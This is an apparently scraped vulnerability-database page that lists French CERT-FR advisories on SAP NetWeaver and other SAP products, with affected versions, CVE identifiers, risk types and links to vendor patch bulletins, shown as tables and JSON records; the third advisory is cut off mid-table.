Search criteria
540 vulnerabilities found for NetWeaver by SAP
CERTFR-2025-AVI-0867
Vulnerability from certfr_avis - Published: 2025-10-14 - Updated: 2025-10-14
De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SAP | SAP NetWeaver AS Java | NetWeaver AS Java version SERVERCORE 7.50 sans le dernier correctif de sécurité | ||
| SAP | Financial Service Claims Management | Financial Service Claims Management versions INSURANCE 803, 804, 805, 806, S4CEXT 107, 108 et 109 sans le dernier correctif de sécurité | ||
| SAP | Print Service | Print Service versions SAPSPRINT 8.00 et 8.10 sans le dernier correctif de sécurité | ||
| SAP | Data Hub Integration Suite | Data Hub Integration Suite version CX_DATAHUB_INT_PACK 2205 sans le dernier correctif de sécurité | ||
| SAP | BusinessObjects | BusinessObjects versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de sécurité | ||
| SAP | NetWeaver Application Server pour ABAP | Application Server pour ABAP versions KRNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93 et 9.16 sans le dernier correctif de sécurité | ||
| SAP | NetWeaver | NetWeaver versions SAP_ABA 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75D, 75E, 75F, 75G, 75H et 75I sans le dernier correctif de sécurité | ||
| SAP | S/4HANA | S/4HANA versions S4CORE 104, 105, 106, 107, 108 et 109 sans le dernier correctif de sécurité | ||
| SAP | Cloud Appliance Library Appliances | Cloud Appliance Library Appliances version TITANIUM_WEBAPP 4.0 sans le dernier correctif de sécurité | ||
| SAP | Commerce Cloud | Commerce Cloud versions HY_COM 2205, COM_CLOUD 2211 et 2211-JDK21 sans le dernier correctif de sécurité | ||
| SAP | NetWeaver Application Server pour ABAP | Application Server pour ABAP versions SAP_BASIS 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816 sans le dernier correctif de sécurité | ||
| SAP | NetWeaver Application Server ABAP et ABAP Platform | NetWeaver Application Server ABAP and ABAP Platform versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT, 7.53, KERNEL 7.22, 7.53, 7.54, 7.77, 7.89, 7.93, 9.14, 9.15 et 9.16 sans le dernier correctif de sécurité | ||
| SAP | Supplier Relationship Management | Supplier Relationship Management versions SRMNXP01 100 et 150 sans le dernier correctif de sécurité | ||
| SAP | NetWeaver Application Server ABAP | NetWeaver Application Server ABAP versions RNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93, 9.12 et 9.14 sans le dernier correctif de sécurité |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "NetWeaver AS Java version SERVERCORE 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "SAP NetWeaver AS Java",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Financial Service Claims Management versions INSURANCE 803, 804, 805, 806, S4CEXT 107, 108 et 109 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Financial Service Claims Management",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Print Service versions SAPSPRINT 8.00 et 8.10 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Print Service",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Data Hub Integration Suite version CX_DATAHUB_INT_PACK 2205 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Data Hub Integration Suite",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "BusinessObjects versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "BusinessObjects",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Application Server pour ABAP versions KRNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93 et 9.16 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "NetWeaver Application Server pour ABAP",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver versions SAP_ABA 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75D, 75E, 75F, 75G, 75H et 75I sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA versions S4CORE 104, 105, 106, 107, 108 et 109 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Cloud Appliance Library Appliances version TITANIUM_WEBAPP 4.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Cloud Appliance Library Appliances",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Commerce Cloud versions HY_COM 2205, COM_CLOUD 2211 et 2211-JDK21 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Commerce Cloud",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Application Server pour ABAP versions SAP_BASIS 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "NetWeaver Application Server pour ABAP",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server ABAP and ABAP Platform versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT, 7.53, KERNEL 7.22, 7.53, 7.54, 7.77, 7.89, 7.93, 9.14, 9.15 et 9.16 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "NetWeaver Application Server ABAP et ABAP Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Supplier Relationship Management versions SRMNXP01 100 et 150 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Supplier Relationship Management",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server ABAP versions RNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93, 9.12 et 9.14 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "NetWeaver Application Server ABAP",
"vendor": {
"name": "SAP",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-42944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42944"
},
{
"name": "CVE-2025-42906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42906"
},
{
"name": "CVE-2025-42902",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42902"
},
{
"name": "CVE-2025-42903",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42903"
},
{
"name": "CVE-2025-42910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42910"
},
{
"name": "CVE-2025-42909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42909"
},
{
"name": "CVE-2025-5115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5115"
},
{
"name": "CVE-2025-42984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42984"
},
{
"name": "CVE-2025-42908",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42908"
},
{
"name": "CVE-2025-42937",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42937"
},
{
"name": "CVE-2025-0059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0059"
},
{
"name": "CVE-2025-48913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48913"
},
{
"name": "CVE-2025-42939",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42939"
},
{
"name": "CVE-2025-31672",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31672"
},
{
"name": "CVE-2025-31331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31331"
},
{
"name": "CVE-2025-42901",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42901"
}
],
"initial_release_date": "2025-10-14T00:00:00",
"last_revision_date": "2025-10-14T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0867",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-10-14T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
"vendor_advisories": [
{
"published_at": "2025-10-14",
"title": "Bulletin de s\u00e9curit\u00e9 SAP october-2025",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html"
}
]
}
CERTFR-2025-AVI-0564
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SAP | NetWeaver | NetWeaver et ABAP Platform (SDCCN) versions ST-PI 2008_1_700, 2008_1_710 et 740 | ||
| SAP | NetWeaver | NetWeaver Application Server ABAP and ABAP Platform versionsAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 et SAP_BASIS 758 | ||
| SAP | Business Objects Business Intelligence Platform | BusinessObjects Business Intelligence Platform (Web Intelligence) versions ENTERPRISE 430, 2025, 2027, ENTERPRISECLIENTTOOLS 430, 2025 et 2027 | ||
| SAP | NetWeaver | NetWeaver Application Server Java version ENGINEAPI 7.50 | ||
| SAP | NetWeaver | NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 | ||
| SAP | Business Warehouse | Business Warehouse and SAP BW/4HANA BEx Tools version DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701 | ||
| SAP | NetWeaver | NetWeaver Enterprise Portal Administration version EP-RUNTIME 7.50 | ||
| SAP | Business Objects Business Intelligence Platform | Business Objects Business Intelligence Platform (CMC) versions ENTERPRISE 430 et 2025 | ||
| SAP | NetWeaver | NetWeaver Enterprise Portal Federated Portal Network version EP-RUNTIME 7.50 | ||
| SAP | NetWeaver | NetWeaver (RFC enabled function module) versions SAP_BW 700, 701, 702, 710, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816, 914 et 916 | ||
| SAP | NetWeaver | NetWeaver Application Server ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 | ||
| SAP | S/4HANA (Private Cloud) | S/4HANA and SAP SCM (Characteristic Propagation) versions SCMAPO 713, 714, S4CORE 102, 103, 104, S4COREOP 105, 106, 107, 108, SCM 700, 701, 702 et 712 | ||
| SAP | N/A | SAPCAR versions SAP_CAR 7.53 et 7.22EXT | ||
| SAP | S/4HANA (Private Cloud) | S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 et 758 | ||
| SAP | NetWeaver | NetWeaver ABAP Server and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914 et SAP_BASIS 915 | ||
| SAP | NetWeaver | NetWeaver et ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753 et SAP_BASIS 754 | ||
| SAP | NetWeaver | NetWeaver Application Server for Java (Log Viewer) version LMNWABASICAPPS 7.50 | ||
| SAP | NetWeaver | NetWeaver (XML Data Archiving Service) version J2EE-APPS 7.50 | ||
| SAP | Business Objects Business Intelligence Platform | BusinessObjects Content Administrator workbench versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701 | ||
| SAP | N/A | Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 et 758 | ||
| SAP | N/A | Data Services (DQ Report) versions SBOP_DS_MANAGEMENT_CONSOLE 4.3 et 2025 | ||
| SAP | NetWeaver | NetWeaver Visual Composer version VCBASE 7.50 | ||
| SAP | NetWeaver | NetWeaver Business Warehouse (CCAW application) versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701 | ||
| SAP | N/A | Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14 | ||
| SAP | Business Warehouse | Business Warehouse (Business Explorer Web 3.5 loading animation) versions DW4CORE 100, 200, 300, 400, 916, SAP_BW 730, 731, 740, 750, 751, 752, 753, 754, 756, 757 et 758 | ||
| SAP | NetWeaver | NetWeaver Application Server for ABAP versions SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 | ||
| SAP | Business Objects Business Intelligence Platform | BusinessObjects BI Platform Central Management Console Promotion Management Application versions ENTERPRISE 430, 2025 et 2027 | ||
| SAP | Business Warehouse | Business Warehouse et SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "NetWeaver et ABAP Platform (SDCCN) versions ST-PI 2008_1_700, 2008_1_710 et 740",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server ABAP and ABAP Platform versionsAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 et SAP_BASIS 758",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "BusinessObjects Business Intelligence Platform (Web Intelligence) versions ENTERPRISE 430, 2025, 2027, ENTERPRISECLIENTTOOLS 430, 2025 et 2027",
"product": {
"name": "Business Objects Business Intelligence Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server Java version ENGINEAPI 7.50",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business Warehouse and SAP BW/4HANA BEx Tools version DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701",
"product": {
"name": "Business Warehouse",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Enterprise Portal Administration version EP-RUNTIME 7.50",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business Objects Business Intelligence Platform (CMC) versions ENTERPRISE 430 et 2025",
"product": {
"name": "Business Objects Business Intelligence Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Enterprise Portal Federated Portal Network version EP-RUNTIME 7.50",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver (RFC enabled function module) versions SAP_BW 700, 701, 702, 710, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816, 914 et 916",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA and SAP SCM (Characteristic Propagation) versions SCMAPO 713, 714, S4CORE 102, 103, 104, S4COREOP 105, 106, 107, 108, SCM 700, 701, 702 et 712",
"product": {
"name": "S/4HANA (Private Cloud)",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "SAPCAR versions SAP_CAR 7.53 et 7.22EXT",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 et 758",
"product": {
"name": "S/4HANA (Private Cloud)",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver ABAP Server and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914 et SAP_BASIS 915",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver et ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753 et SAP_BASIS 754",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server for Java (Log Viewer) version LMNWABASICAPPS 7.50",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver (XML Data Archiving Service) version J2EE-APPS 7.50",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "BusinessObjects Content Administrator workbench versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701",
"product": {
"name": "Business Objects Business Intelligence Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 et 758",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Data Services (DQ Report) versions SBOP_DS_MANAGEMENT_CONSOLE 4.3 et 2025",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Visual Composer version VCBASE 7.50",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Business Warehouse (CCAW application) versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business Warehouse (Business Explorer Web 3.5 loading animation) versions DW4CORE 100, 200, 300, 400, 916, SAP_BW 730, 731, 740, 750, 751, 752, 753, 754, 756, 757 et 758",
"product": {
"name": "Business Warehouse",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server for ABAP versions SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "BusinessObjects BI Platform Central Management Console Promotion Management Application versions ENTERPRISE 430, 2025 et 2027",
"product": {
"name": "Business Objects Business Intelligence Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business Warehouse et SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816",
"product": {
"name": "Business Warehouse",
"vendor": {
"name": "SAP",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-42985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42985"
},
{
"name": "CVE-2025-42968",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42968"
},
{
"name": "CVE-2025-42971",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42971"
},
{
"name": "CVE-2025-42954",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42954"
},
{
"name": "CVE-2025-42970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42970"
},
{
"name": "CVE-2025-42953",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42953"
},
{
"name": "CVE-2025-31326",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31326"
},
{
"name": "CVE-2025-42961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42961"
},
{
"name": "CVE-2025-42974",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42974"
},
{
"name": "CVE-2025-42978",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42978"
},
{
"name": "CVE-2025-30012",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30012"
},
{
"name": "CVE-2025-42952",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42952"
},
{
"name": "CVE-2025-42981",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42981"
},
{
"name": "CVE-2025-42979",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42979"
},
{
"name": "CVE-2025-42993",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42993"
},
{
"name": "CVE-2025-42959",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42959"
},
{
"name": "CVE-2025-42963",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42963"
},
{
"name": "CVE-2025-42969",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42969"
},
{
"name": "CVE-2025-42977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42977"
},
{
"name": "CVE-2025-42986",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42986"
},
{
"name": "CVE-2025-42966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42966"
},
{
"name": "CVE-2025-30009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30009"
},
{
"name": "CVE-2025-30011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30011"
},
{
"name": "CVE-2025-42962",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42962"
},
{
"name": "CVE-2025-42956",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42956"
},
{
"name": "CVE-2025-43001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43001"
},
{
"name": "CVE-2024-53677",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53677"
},
{
"name": "CVE-2025-30010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30010"
},
{
"name": "CVE-2025-42997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42997"
},
{
"name": "CVE-2025-42965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42965"
},
{
"name": "CVE-2025-30018",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30018"
},
{
"name": "CVE-2025-42967",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42967"
},
{
"name": "CVE-2025-42980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42980"
},
{
"name": "CVE-2025-42964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42964"
},
{
"name": "CVE-2025-42992",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42992"
},
{
"name": "CVE-2025-42973",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42973"
},
{
"name": "CVE-2025-42960",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42960"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0564",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-07-08T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
"vendor_advisories": [
{
"published_at": "2025-07-08",
"title": "Bulletin de s\u00e9curit\u00e9 SAP july-2025",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html"
}
]
}
CERTFR-2025-AVI-0487
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une atteinte à l'intégrité des données et une falsification de requêtes côté serveur (SSRF).
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SAP | Business Objects Business Intelligence Platform | Business Objects Business Intelligence Platform versions ENTERPRISE 430, 2025 et 2027 | ||
| SAP | NetWeaver | NetWeaver (ABAP Keyword Documentation) versions SAP_BASIS 758 | ||
| SAP | NetWeaver Visual Composer | NetWeaver Visual Composer versions VCBASE 7.50 | ||
| SAP | Business One Integration Framework | Business One Integration Framework versions B1_ON_HANA 10.0 et SAP-M-BO 10.0 | ||
| SAP | MDM Server | MDM Server versions 710.750 | ||
| SAP | S/4HANA | S/4HANA (Manage Processing Rules - For Bank Statement) versions S4CORE 104, 105, 106, 107 et 108 | ||
